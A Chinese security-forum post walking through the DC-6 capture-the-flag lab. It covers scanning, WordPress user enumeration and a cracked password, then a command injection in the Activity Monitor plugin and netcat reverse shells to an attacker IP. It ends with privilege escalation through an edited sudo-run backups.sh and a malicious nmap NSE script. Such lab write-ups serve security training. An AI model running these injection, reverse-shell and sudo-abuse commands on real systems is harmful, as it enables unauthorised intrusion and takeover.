安全矩阵

 找回密码
 立即注册
搜索
查看: 2591|回复: 0

DC6

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-11-3 16:11:39 | 显示全部楼层 |阅读模式
复现DC-6
这些都是19年前的版本,现在更新到了86的新版本。
现在学的技术还是人家3年前的技术,还是得努力
下再下来

直接用VM打开
第一次打这种,

咋不给密码
看了看社区才发现密码要自己找

先查一查这个虚拟机的ip
不要直接再本机用cmd的ipconfig,是假的
直接 kali同网段:arp-scan -l
kali:192.168.0.105
DC-6:192.168.0.141
nmap扫一下这个ip

─# nmap -T4 -A -p- 192.168.0.141 //-A是进攻性扫描,T4是设置扫描时序级别,一般用4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 17:58 CST
Nmap scan report for localhost (192.168.0.141)
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:58B:F5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms localhost (192.168.0.141)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.34 seconds
直接访问一下开放的端口

访问不了,需要添加host
vi /etc/hosts


ok,发现是wordpress站点
直接wpscan扫一下
wpscan --url http://wordy/ -e u //扫描wordpress用户

nteresting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|  - http://codex.wordpress.org/XML-RPC_Pingback_API
|  - https://www.rapid7.com/db/module ... press_ghost_scanner
|  - https://www.rapid7.com/db/module ... ordpress_xmlrpc_dos
|  - https://www.rapid7.com/db/module ... dpress_xmlrpc_login
|  - https://www.rapid7.com/db/module ... ess_pingback_access

[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|  - https://www.iplocation.net/defend-wordpress-from-ddos
|  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
|  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
|  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
|  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
|  Wp Json Api (Aggressive Detection)
|   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|  Login Error Messages (Aggressive Detection)

[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Nov  1 18:13:43 2021
[+] Requests Done: 78
[+] Cached Requests: 6
[+] Data Sent: 17.65 KB
[+] Data Received: 17.834 MB
[+] Memory used: 151.133 MB
[+] Elapsed time: 00:00:05
同时可以 -e vp扫一扫插件漏洞

并没有漏洞
搜集好用户名并保存到user.txt,以及字典是从/usr/share/wordlists里面找,跟着所给的线索把rockyou.txt里含有k01的字段重新写进新建的passwords.txt里面去
得到账号密码后,爆破出用户名为mark,密码为helpdesk01
后台登入口:/wp-login.php
WordPress 5.8.1 存在插件漏洞



该漏洞为Activity Monitor插件远程命令执行漏洞,找到activity monitor,选择tools,输入127.0.0.1|ls /,查看文件
反弹shell
127.0.0.1|nc 192.168.0.105 6666 -e /bin/bash
o对 限制了输入框的输入长度,f12改一下

ok


没有完全反弹
python -c 'import pty;pty.spawn("/bin/bash")'  //当然是因为靶机有python
ok



用户名:graham 密码:GSo7isUM1D4,然后在jens用户目录下有个打包备份的脚本;先进行用户的切换
可以看到jens下的backups.sh(是免密权限运行,意味在backups.sh里插入一个反弹shell并执行的话会反弹jens的shell会话
echo 'nc 192.168.0.105 996 -e /bin/bash' > backups.sh
sudo -u jens ./backups.sh
ok


成功提到root
看到有nmap:可以用nmap提权
可以看到是可以使用root权限免密运行,还是和刚刚的思路一样,也是把shell呢进行反弹,因为nmap能够执行脚本功能,直接把/bin/sh写进/tmp/xxx.nse,然后让nmap运行它就可以直接提权
echo 'os.execute("/bin/sh")' > /tmp/xxx.nse
sudo nmap --script=/tmp/xxx.nse
ok


cat theflag.txt
ok

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 21:34 , Processed in 0.013621 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表